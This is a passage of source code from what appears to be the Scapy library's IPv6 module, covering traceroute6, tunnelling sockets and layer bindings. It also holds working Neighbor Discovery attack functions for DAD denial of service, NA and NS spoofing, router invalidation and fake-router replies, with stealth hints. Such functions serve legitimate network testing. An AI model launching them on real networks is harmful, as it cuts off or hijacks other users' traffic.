3406 2: MIP6MH_CoTI, 

3407 3: MIP6MH_HoT, 

3408 4: MIP6MH_CoT, 

3409 5: MIP6MH_BU, 

3410 6: MIP6MH_BA, 

3411 7: MIP6MH_BE} 

3412 

3413 

3414############################################################################# 

3415############################################################################# 

3416# Traceroute6 # 

3417############################################################################# 

3418############################################################################# 

3419 

3420class AS_resolver6(AS_resolver_riswhois): 

3421 def _resolve_one(self, ip): 

3422 """ 

3423 overloaded version to provide a Whois resolution on the 

3424 embedded IPv4 address if the address is 6to4 or Teredo. 

3425 Otherwise, the native IPv6 address is passed. 

3426 """ 

3427 

3428 if in6_isaddr6to4(ip): # for 6to4, use embedded @ 

3429 tmp = inet_pton(socket.AF_INET6, ip) 

3430 addr = inet_ntop(socket.AF_INET, tmp[2:6]) 

3431 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address 

3432 addr = teredoAddrExtractInfo(ip)[2] 

3433 else: 

3434 addr = ip 

3435 

3436 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) 

3437 

3438 if asn.startswith("AS"): 

3439 try: 

3440 asn = int(asn[2:]) 

3441 except ValueError: 

3442 pass 

3443 

3444 return ip, asn, desc 

3445 

3446 

3447class TracerouteResult6(TracerouteResult): 

3448 __slots__ = [] 

3449 

3450 def show(self): 

3451 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501 

3452 s.hlim, 

3453 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501 

3454 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501 

3455 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501 

3456 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501 

3457 

3458 def get_trace(self): 

3459 trace = {} 

3460 

3461 for s, r in self.res: 

3462 if IPv6 not in s: 

3463 continue 

3464 d = s[IPv6].dst 

3465 if d not in trace: 

3466 trace[d] = {} 

3467 

3468 t = not (ICMPv6TimeExceeded in r or 

3469 ICMPv6DestUnreach in r or 

3470 ICMPv6PacketTooBig in r or 

3471 ICMPv6ParamProblem in r) 

3472 

3473 trace[d][s[IPv6].hlim] = r[IPv6].src, t 

3474 

3475 for k in trace.values(): 

3476 try: 

3477 m = min(x for x, y in k.items() if y[1]) 

3478 except ValueError: 

3479 continue 

3480 for li in list(k): # use list(): k is modified in the loop 

3481 if li > m: 

3482 del k[li] 

3483 

3484 return trace 

3485 

3486 def graph(self, ASres=AS_resolver6(), **kargs): 

3487 TracerouteResult.graph(self, ASres=ASres, **kargs) 

3488 

3489 

3490@conf.commands.register 

3491def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), 

3492 l4=None, timeout=2, verbose=None, **kargs): 

3493 """Instant TCP traceroute using IPv6 

3494 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None 

3495 """ 

3496 if verbose is None: 

3497 verbose = conf.verb 

3498 

3499 if l4 is None: 

3500 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501 

3501 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501 

3502 else: 

3503 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4, 

3504 timeout=timeout, verbose=verbose, **kargs) 

3505 

3506 a = TracerouteResult6(a.res) 

3507 

3508 if verbose: 

3509 a.show() 

3510 

3511 return a, b 

3512 

3513############################################################################# 

3514############################################################################# 

3515# Sockets # 

3516############################################################################# 

3517############################################################################# 

3518 

3519 

3520if not WINDOWS: 

3521 from scapy.supersocket import L3RawSocket 

3522 

3523 class L3RawSocket6(L3RawSocket): 

3524 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 

3525 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 

3526 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 

3527 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 

3528 self.iface = iface 

3529 

3530 

3531def IPv6inIP(dst='203.178.135.36', src=None): 

3532 _IPv6inIP.dst = dst 

3533 _IPv6inIP.src = src 

3534 if not conf.L3socket == _IPv6inIP: 

3535 _IPv6inIP.cls = conf.L3socket 

3536 else: 

3537 del conf.L3socket 

3538 return _IPv6inIP 

3539 

3540 

3541class _IPv6inIP(SuperSocket): 

3542 dst = '127.0.0.1' 

3543 src = None 

3544 cls = None 

3545 

3546 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501 

3547 SuperSocket.__init__(self, family, type, proto) 

3548 self.worker = self.cls(**args) 

3549 

3550 def set(self, dst, src=None): 

3551 _IPv6inIP.src = src 

3552 _IPv6inIP.dst = dst 

3553 

3554 def nonblock_recv(self): 

3555 p = self.worker.nonblock_recv() 

3556 return self._recv(p) 

3557 

3558 def recv(self, x): 

3559 p = self.worker.recv(x) 

3560 return self._recv(p, x) 

3561 

3562 def _recv(self, p, x=MTU): 

3563 if p is None: 

3564 return p 

3565 elif isinstance(p, IP): 

3566 # TODO: verify checksum 

3567 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: 

3568 if isinstance(p.payload, IPv6): 

3569 return p.payload 

3570 return p 

3571 

3572 def send(self, x): 

3573 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501 

3574 

3575 

3576############################################################################# 

3577############################################################################# 

3578# Neighbor Discovery Protocol Attacks # 

3579############################################################################# 

3580############################################################################# 

3581 

3582def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, 

3583 tgt_filter=None, reply_mac=None): 

3584 """ 

3585 Internal generic helper accepting a specific callback as first argument, 

3586 for NS or NA reply. See the two specific functions below. 

3587 """ 

3588 

3589 def is_request(req, mac_src_filter, tgt_filter): 

3590 """ 

3591 Check if packet req is a request 

3592 """ 

3593 

3594 # Those simple checks are based on Section 5.4.2 of RFC 4862 

3595 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 

3596 return 0 

3597 

3598 # Get and compare the MAC address 

3599 mac_src = req[Ether].src 

3600 if mac_src_filter and mac_src != mac_src_filter: 

3601 return 0 

3602 

3603 # Source must be the unspecified address 

3604 if req[IPv6].src != "::": 

3605 return 0 

3606 

3607 # Check destination is the link-local solicited-node multicast 

3608 # address associated with target address in received NS 

3609 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 

3610 if tgt_filter and tgt != tgt_filter: 

3611 return 0 

3612 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) 

3613 expected_snma = in6_getnsma(tgt) 

3614 if received_snma != expected_snma: 

3615 return 0 

3616 

3617 return 1 

3618 

3619 if not iface: 

3620 iface = conf.iface 

3621 

3622 # To prevent sniffing our own traffic 

3623 if not reply_mac: 

3624 reply_mac = get_if_hwaddr(iface) 

3625 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

3626 

3627 sniff(store=0, 

3628 filter=sniff_filter, 

3629 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 

3630 prn=lambda x: reply_callback(x, reply_mac, iface), 

3631 iface=iface) 

3632 

3633 

3634def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, 

3635 reply_mac=None): 

3636 """ 

3637 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 

3638 3756. This is done by listening incoming NS messages sent from the 

3639 unspecified address and sending a NS reply for the target address, 

3640 leading the peer to believe that another node is also performing DAD 

3641 for that address. 

3642 

3643 By default, the fake NS sent to create the DoS uses: 

3644 - as target address the target address found in received NS. 

3645 - as IPv6 source address: the unspecified address (::). 

3646 - as IPv6 destination address: the link-local solicited-node multicast 

3647 address derived from the target address in received NS. 

3648 - the mac address of the interface as source (or reply_mac, see below). 

3649 - the multicast mac address derived from the solicited node multicast 

3650 address used as IPv6 destination address. 

3651 

3652 Following arguments can be used to change the behavior: 

3653 

3654 iface: a specific interface (e.g. "eth0") of the system on which the 

3655 DoS should be launched. If None is provided conf.iface is used. 

3656 

3657 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3658 Only NS messages received from this source will trigger replies. 

3659 This allows limiting the effects of the DoS to a single target by 

3660 filtering on its mac address. The default value is None: the DoS 

3661 is not limited to a specific mac address. 

3662 

3663 tgt_filter: Same as previous but for a specific target IPv6 address for 

3664 received NS. If the target address in the NS message (not the IPv6 

3665 destination address) matches that address, then a fake reply will 

3666 be sent, i.e. the emitter will be a target of the DoS. 

3667 

3668 reply_mac: allow specifying a specific source mac address for the reply, 

3669 i.e. to prevent the use of the mac address of the interface. 

3670 """ 

3671 

3672 def ns_reply_callback(req, reply_mac, iface): 

3673 """ 

3674 Callback that reply to a NS by sending a similar NS 

3675 """ 

3676 

3677 # Let's build a reply and send it 

3678 mac = req[Ether].src 

3679 dst = req[IPv6].dst 

3680 tgt = req[ICMPv6ND_NS].tgt 

3681 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501 

3682 sendp(rep, iface=iface, verbose=0) 

3683 

3684 print("Reply NS for target address %s (received from %s)" % (tgt, mac)) 

3685 

3686 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, 

3687 tgt_filter, reply_mac) 

3688 

3689 

3690def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, 

3691 reply_mac=None): 

3692 """ 

3693 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 

3694 3756. This is done by listening incoming NS messages *sent from the 

3695 unspecified address* and sending a NA reply for the target address, 

3696 leading the peer to believe that another node is also performing DAD 

3697 for that address. 

3698 

3699 By default, the fake NA sent to create the DoS uses: 

3700 - as target address the target address found in received NS. 

3701 - as IPv6 source address: the target address found in received NS. 

3702 - as IPv6 destination address: the link-local solicited-node multicast 

3703 address derived from the target address in received NS. 

3704 - the mac address of the interface as source (or reply_mac, see below). 

3705 - the multicast mac address derived from the solicited node multicast 

3706 address used as IPv6 destination address. 

3707 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled 

3708 with the mac address used as source of the NA. 

3709 

3710 Following arguments can be used to change the behavior: 

3711 

3712 iface: a specific interface (e.g. "eth0") of the system on which the 

3713 DoS should be launched. If None is provided conf.iface is used. 

3714 

3715 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3716 Only NS messages received from this source will trigger replies. 

3717 This allows limiting the effects of the DoS to a single target by 

3718 filtering on its mac address. The default value is None: the DoS 

3719 is not limited to a specific mac address. 

3720 

3721 tgt_filter: Same as previous but for a specific target IPv6 address for 

3722 received NS. If the target address in the NS message (not the IPv6 

3723 destination address) matches that address, then a fake reply will 

3724 be sent, i.e. the emitter will be a target of the DoS. 

3725 

3726 reply_mac: allow specifying a specific source mac address for the reply, 

3727 i.e. to prevent the use of the mac address of the interface. This 

3728 address will also be used in the Target Link-Layer Address option. 

3729 """ 

3730 

3731 def na_reply_callback(req, reply_mac, iface): 

3732 """ 

3733 Callback that reply to a NS with a NA 

3734 """ 

3735 

3736 # Let's build a reply and send it 

3737 mac = req[Ether].src 

3738 dst = req[IPv6].dst 

3739 tgt = req[ICMPv6ND_NS].tgt 

3740 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst) 

3741 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741 

3742 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 

3743 sendp(rep, iface=iface, verbose=0) 

3744 

3745 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 

3746 

3747 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, 

3748 tgt_filter, reply_mac) 

3749 

3750 

3751def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, 

3752 reply_mac=None, router=False): 

3753 """ 

3754 The main purpose of this function is to send fake Neighbor Advertisement 

3755 messages to a victim. As the emission of unsolicited Neighbor Advertisement 

3756 is pretty pointless (from an attacker standpoint) because it will not 

3757 lead to a modification of a victim's neighbor cache, the function send 

3758 advertisements in response to received NS (NS sent as part of the DAD, 

3759 i.e. with an unspecified address as source, are not considered). 

3760 

3761 By default, the fake NA sent to create the DoS uses: 

3762 - as target address the target address found in received NS. 

3763 - as IPv6 source address: the target address 

3764 - as IPv6 destination address: the source IPv6 address of received NS 

3765 message. 

3766 - the mac address of the interface as source (or reply_mac, see below). 

3767 - the source mac address of the received NS as destination macs address 

3768 of the emitted NA. 

3769 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) 

3770 filled with the mac address used as source of the NA. 

3771 

3772 Following arguments can be used to change the behavior: 

3773 

3774 iface: a specific interface (e.g. "eth0") of the system on which the 

3775 DoS should be launched. If None is provided conf.iface is used. 

3776 

3777 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3778 Only NS messages received from this source will trigger replies. 

3779 This allows limiting the effects of the DoS to a single target by 

3780 filtering on its mac address. The default value is None: the DoS 

3781 is not limited to a specific mac address. 

3782 

3783 tgt_filter: Same as previous but for a specific target IPv6 address for 

3784 received NS. If the target address in the NS message (not the IPv6 

3785 destination address) matches that address, then a fake reply will 

3786 be sent, i.e. the emitter will be a target of the DoS. 

3787 

3788 reply_mac: allow specifying a specific source mac address for the reply, 

3789 i.e. to prevent the use of the mac address of the interface. This 

3790 address will also be used in the Target Link-Layer Address option. 

3791 

3792 router: by the default (False) the 'R' flag in the NA used for the reply 

3793 is not set. If the parameter is set to True, the 'R' flag in the 

3794 NA is set, advertising us as a router. 

3795 

3796 Please, keep the following in mind when using the function: for obvious 

3797 reasons (kernel space vs. Python speed), when the target of the address 

3798 resolution is on the link, the sender of the NS receives 2 NA messages 

3799 in a row, the valid one and our fake one. The second one will overwrite 

3800 the information provided by the first one, i.e. the natural latency of 

3801 Scapy helps here. 

3802 

3803 In practice, on a common Ethernet link, the emission of the NA from the 

3804 genuine target (kernel stack) usually occurs in the same millisecond as 

3805 the receipt of the NS. The NA generated by Scapy6 will usually come after 

3806 something 20+ ms. On a usual testbed for instance, this difference is 

3807 sufficient to have the first data packet sent from the victim to the 

3808 destination before it even receives our fake NA. 

3809 """ 

3810 

3811 def is_request(req, mac_src_filter, tgt_filter): 

3812 """ 

3813 Check if packet req is a request 

3814 """ 

3815 

3816 # Those simple checks are based on Section 5.4.2 of RFC 4862 

3817 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 

3818 return 0 

3819 

3820 mac_src = req[Ether].src 

3821 if mac_src_filter and mac_src != mac_src_filter: 

3822 return 0 

3823 

3824 # Source must NOT be the unspecified address 

3825 if req[IPv6].src == "::": 

3826 return 0 

3827 

3828 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 

3829 if tgt_filter and tgt != tgt_filter: 

3830 return 0 

3831 

3832 dst = req[IPv6].dst 

3833 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. 

3834 

3835 # If this is a real address resolution NS, then the destination 

3836 # address of the packet is the link-local solicited node multicast 

3837 # address associated with the target of the NS. 

3838 # Otherwise, the NS is a NUD related one, i.e. the peer is 

3839 # unicasting the NS to check the target is still alive (L2 

3840 # information is still in its cache and it is verified) 

3841 received_snma = inet_pton(socket.AF_INET6, dst) 

3842 expected_snma = in6_getnsma(tgt) 

3843 if received_snma != expected_snma: 

3844 print("solicited node multicast @ does not match target @!") 

3845 return 0 

3846 

3847 return 1 

3848 

3849 def reply_callback(req, reply_mac, router, iface): 

3850 """ 

3851 Callback that reply to a NS with a spoofed NA 

3852 """ 

3853 

3854 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and 

3855 # send it back. 

3856 mac = req[Ether].src 

3857 pkt = req[IPv6] 

3858 src = pkt.src 

3859 tgt = req[ICMPv6ND_NS].tgt 

3860 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src) 

3861 # Use the target field from the NS 

3862 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741 

3863 

3864 # "If the solicitation IP Destination Address is not a multicast 

3865 # address, the Target Link-Layer Address option MAY be omitted" 

3866 # Given our purpose, we always include it. 

3867 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 

3868 

3869 sendp(rep, iface=iface, verbose=0) 

3870 

3871 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 

3872 

3873 if not iface: 

3874 iface = conf.iface 

3875 # To prevent sniffing our own traffic 

3876 if not reply_mac: 

3877 reply_mac = get_if_hwaddr(iface) 

3878 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

3879 

3880 router = 1 if router else 0 # Value of the R flags in NA 

3881 

3882 sniff(store=0, 

3883 filter=sniff_filter, 

3884 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 

3885 prn=lambda x: reply_callback(x, reply_mac, router, iface), 

3886 iface=iface) 

3887 

3888 

3889def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", 

3890 dst=None, src_mac=None, dst_mac=None, loop=True, 

3891 inter=1, iface=None): 

3892 """ 

3893 The main purpose of this function is to send fake Neighbor Solicitations 

3894 messages to a victim, in order to either create a new entry in its neighbor 

3895 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated 

3896 that a node SHOULD create the entry or update an existing one (if it is not 

3897 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501 

3898 state is set to STALE. 

3899 

3900 The two main parameters of the function are the source link-layer address 

3901 (carried by the Source Link-Layer Address option in the NS) and the 

3902 source address of the packet. 

3903 

3904 Unlike some other NDP_Attack_* function, this one is not based on a 

3905 stimulus/response model. When called, it sends the same NS packet in loop 

3906 every second (the default) 

3907 

3908 Following arguments can be used to change the format of the packets: 

3909 

3910 src_lladdr: the MAC address used in the Source Link-Layer Address option 

3911 included in the NS packet. This is the address that the peer should 

3912 associate in its neighbor cache with the IPv6 source address of the 

3913 packet. If None is provided, the mac address of the interface is 

3914 used. 

3915 

3916 src: the IPv6 address used as source of the packet. If None is provided, 

3917 an address associated with the emitting interface will be used 

3918 (based on the destination address of the packet). 

3919 

3920 target: the target address of the NS packet. If no value is provided, 

3921 a dummy address (2001:db8::1) is used. The value of the target 

3922 has a direct impact on the destination address of the packet if it 

3923 is not overridden. By default, the solicited-node multicast address 

3924 associated with the target is used as destination address of the 

3925 packet. Consider specifying a specific destination address if you 

3926 intend to use a target address different than the one of the victim. 

3927 

3928 dst: The destination address of the NS. By default, the solicited node 

3929 multicast address associated with the target address (see previous 

3930 parameter) is used if no specific value is provided. The victim 

3931 is not expected to check the destination address of the packet, 

3932 so using a multicast address like ff02::1 should work if you want 

3933 the attack to target all hosts on the link. On the contrary, if 

3934 you want to be more stealth, you should provide the target address 

3935 for this parameter in order for the packet to be sent only to the 

3936 victim. 

3937 

3938 src_mac: the MAC address used as source of the packet. By default, this 

3939 is the address of the interface. If you want to be more stealth, 

3940 feel free to use something else. Note that this address is not the 

3941 that the victim will use to populate its neighbor cache. 

3942 

3943 dst_mac: The MAC address used as destination address of the packet. If 

3944 the IPv6 destination address is multicast (all-nodes, solicited 

3945 node, ...), it will be computed. If the destination address is 

3946 unicast, a neighbor solicitation will be performed to get the 

3947 associated address. If you want the attack to be stealth, you 

3948 can provide the MAC address using this parameter. 

3949 

3950 loop: By default, this parameter is True, indicating that NS packets 

3951 will be sent in loop, separated by 'inter' seconds (see below). 

3952 When set to False, a single packet is sent. 

3953 

3954 inter: When loop parameter is True (the default), this parameter provides 

3955 the interval in seconds used for sending NS packets. 

3956 

3957 iface: to force the sending interface. 

3958 """ 

3959 

3960 if not iface: 

3961 iface = conf.iface 

3962 

3963 # Use provided MAC address as source link-layer address option 

3964 # or the MAC address of the interface if none is provided. 

3965 if not src_lladdr: 

3966 src_lladdr = get_if_hwaddr(iface) 

3967 

3968 # Prepare packets parameters 

3969 ether_params = {} 

3970 if src_mac: 

3971 ether_params["src"] = src_mac 

3972 

3973 if dst_mac: 

3974 ether_params["dst"] = dst_mac 

3975 

3976 ipv6_params = {} 

3977 if src: 

3978 ipv6_params["src"] = src 

3979 if dst: 

3980 ipv6_params["dst"] = dst 

3981 else: 

3982 # Compute the solicited-node multicast address 

3983 # associated with the target address. 

3984 tmp = inet_ntop(socket.AF_INET6, 

3985 in6_getnsma(inet_pton(socket.AF_INET6, target))) 

3986 ipv6_params["dst"] = tmp 

3987 

3988 pkt = Ether(**ether_params) 

3989 pkt /= IPv6(**ipv6_params) 

3990 pkt /= ICMPv6ND_NS(tgt=target) 

3991 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) 

3992 

3993 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) 

3994 

3995 

3996def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, 

3997 ip_src_filter=None, reply_mac=None, 

3998 tgt_mac=None): 

3999 """ 

4000 The purpose of the function is to monitor incoming RA messages 

4001 sent by default routers (RA with a non-zero Router Lifetime values) 

4002 and invalidate them by immediately replying with fake RA messages 

4003 advertising a zero Router Lifetime value. 

4004 

4005 The result on receivers is that the router is immediately invalidated, 

4006 i.e. the associated entry is discarded from the default router list 

4007 and destination cache is updated to reflect the change. 

4008 

4009 By default, the function considers all RA messages with a non-zero 

4010 Router Lifetime value but provides configuration knobs to allow 

4011 filtering RA sent by specific routers (Ethernet source address). 

4012 With regard to emission, the multicast all-nodes address is used 

4013 by default but a specific target can be used, in order for the DoS to 

4014 apply only to a specific host. 

4015 

4016 More precisely, following arguments can be used to change the behavior: 

4017 

4018 iface: a specific interface (e.g. "eth0") of the system on which the 

4019 DoS should be launched. If None is provided conf.iface is used. 

4020 

4021 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

4022 Only RA messages received from this source will trigger replies. 

4023 If other default routers advertised their presence on the link, 

4024 their clients will not be impacted by the attack. The default 

4025 value is None: the DoS is not limited to a specific mac address. 

4026 

4027 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 

4028 on. Only RA messages received from this source address will trigger 

4029 replies. If other default routers advertised their presence on the 

4030 link, their clients will not be impacted by the attack. The default 

4031 value is None: the DoS is not limited to a specific IPv6 source 

4032 address. 

4033 

4034 reply_mac: allow specifying a specific source mac address for the reply, 

4035 i.e. to prevent the use of the mac address of the interface. 

4036 

4037 tgt_mac: allow limiting the effect of the DoS to a specific host, 

4038 by sending the "invalidating RA" only to its mac address. 

4039 """ 

4040 

4041 def is_request(req, mac_src_filter, ip_src_filter): 

4042 """ 

4043 Check if packet req is a request 

4044 """ 

4045 

4046 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): 

4047 return 0 

4048 

4049 mac_src = req[Ether].src 

4050 if mac_src_filter and mac_src != mac_src_filter: 

4051 return 0 

4052 

4053 ip_src = req[IPv6].src 

4054 if ip_src_filter and ip_src != ip_src_filter: 

4055 return 0 

4056 

4057 # Check if this is an advertisement for a Default Router 

4058 # by looking at Router Lifetime value 

4059 if req[ICMPv6ND_RA].routerlifetime == 0: 

4060 return 0 

4061 

4062 return 1 

4063 

4064 def ra_reply_callback(req, reply_mac, tgt_mac, iface): 

4065 """ 

4066 Callback that sends an RA with a 0 lifetime 

4067 """ 

4068 

4069 # Let's build a reply and send it 

4070 

4071 src = req[IPv6].src 

4072 

4073 # Prepare packets parameters 

4074 ether_params = {} 

4075 if reply_mac: 

4076 ether_params["src"] = reply_mac 

4077 

4078 if tgt_mac: 

4079 ether_params["dst"] = tgt_mac 

4080 

4081 # Basis of fake RA (high pref, zero lifetime) 

4082 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1") 

4083 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) 

4084 

4085 # Add it a PIO from the request ... 

4086 tmp = req 

4087 while ICMPv6NDOptPrefixInfo in tmp: 

4088 pio = tmp[ICMPv6NDOptPrefixInfo] 

4089 tmp = pio.payload 

4090 del pio.payload 

4091 rep /= pio 

4092 

4093 # ... and source link layer address option 

4094 if ICMPv6NDOptSrcLLAddr in req: 

4095 mac = req[ICMPv6NDOptSrcLLAddr].lladdr 

4096 else: 

4097 mac = req[Ether].src 

4098 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) 

4099 

4100 sendp(rep, iface=iface, verbose=0) 

4101 

4102 print("Fake RA sent with source address %s" % src) 

4103 

4104 if not iface: 

4105 iface = conf.iface 

4106 # To prevent sniffing our own traffic 

4107 if not reply_mac: 

4108 reply_mac = get_if_hwaddr(iface) 

4109 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

4110 

4111 sniff(store=0, 

4112 filter=sniff_filter, 

4113 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 

4114 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), 

4115 iface=iface) 

4116 

4117 

4118def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, 

4119 ip_src_filter=None): 

4120 """ 

4121 The purpose of this function is to send provided RA message at layer 2 

4122 (i.e. providing a packet starting with IPv6 will not work) in response 

4123 to received RS messages. In the end, the function is a simple wrapper 

4124 around sendp() that monitor the link for RS messages. 

4125 

4126 It is probably better explained with an example: 

4127 

4128 >>> ra = Ether()/IPv6()/ICMPv6ND_RA() 

4129 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) 

4130 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) 

4131 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") 

4132 >>> NDP_Attack_Fake_Router(ra, iface="eth0") 

4133 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 

4134 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae 

4135 ... 

4136 

4137 Following arguments can be used to change the behavior: 

4138 

4139 ra: the RA message to send in response to received RS message. 

4140 

4141 iface: a specific interface (e.g. "eth0") of the system on which the 

4142 DoS should be launched. If none is provided, conf.iface is 

4143 used. 

4144 

4145 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

4146 Only RS messages received from this source will trigger a reply. 

4147 Note that no changes to provided RA is done which imply that if 

4148 you intend to target only the source of the RS using this option, 

4149 you will have to set the Ethernet destination address to the same 

4150 value in your RA. 

4151 The default value for this parameter is None: no filtering on the 

4152 source of RS is done. 

4153 

4154 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 

4155 on. Only RS messages received from this source address will trigger 

4156 replies. Same comment as for previous argument apply: if you use 

4157 the option, you will probably want to set a specific Ethernet 

4158 destination address in the RA. 

4159 """ 

4160 

4161 def is_request(req, mac_src_filter, ip_src_filter): 

4162 """ 

4163 Check if packet req is a request 

4164 """ 

4165 

4166 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): 

4167 return 0 

4168 

4169 mac_src = req[Ether].src 

4170 if mac_src_filter and mac_src != mac_src_filter: 

4171 return 0 

4172 

4173 ip_src = req[IPv6].src 

4174 if ip_src_filter and ip_src != ip_src_filter: 

4175 return 0 

4176 

4177 return 1 

4178 

4179 def ra_reply_callback(req, iface): 

4180 """ 

4181 Callback that sends an RA in reply to an RS 

4182 """ 

4183 

4184 src = req[IPv6].src 

4185 sendp(ra, iface=iface, verbose=0) 

4186 print("Fake RA sent in response to RS from %s" % src) 

4187 

4188 if not iface: 

4189 iface = conf.iface 

4190 sniff_filter = "icmp6" 

4191 

4192 sniff(store=0, 

4193 filter=sniff_filter, 

4194 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 

4195 prn=lambda x: ra_reply_callback(x, iface), 

4196 iface=iface) 

4197 

4198############################################################################# 

4199# Pre-load classes ## 

4200############################################################################# 

4201 

4202 

4203def _get_cls(name): 

4204 return globals().get(name, Raw) 

4205 

4206 

4207def _load_dict(d): 

4208 for k, v in d.items(): 

4209 d[k] = _get_cls(v) 

4210 

4211 

4212_load_dict(icmp6ndoptscls) 

4213_load_dict(icmp6typescls) 

4214_load_dict(ipv6nhcls) 

4215 

4216############################################################################# 

4217############################################################################# 

4218# Layers binding # 

4219############################################################################# 

4220############################################################################# 

4221 

4222conf.l3types.register(ETH_P_IPV6, IPv6) 

4223conf.l3types.register_num2layer(ETH_P_ALL, IPv46) 

4224conf.l2types.register(31, IPv6) 

4225conf.l2types.register(DLT_IPV6, IPv6) 

4226conf.l2types.register(DLT_RAW, IPv46) 

4227conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46) 

4228if OPENBSD: 

4229 conf.l2types.register_num2layer(229, IPv6) 

4230 

4231bind_layers(Ether, IPv6, type=0x86dd) 

4232bind_layers(CookedLinux, IPv6, proto=0x86dd) 

4233bind_layers(GRE, IPv6, proto=0x86dd) 

4234bind_layers(SNAP, IPv6, code=0x86dd) 

4235# AF_INET6 values are platform-dependent. For a detailed explaination, read 

4236# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501 

4237if WINDOWS: 

4238 bind_layers(Loopback, IPv6, type=0x18) 

4239else: 

4240 bind_layers(Loopback, IPv6, type=socket.AF_INET6) 

4241bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) 

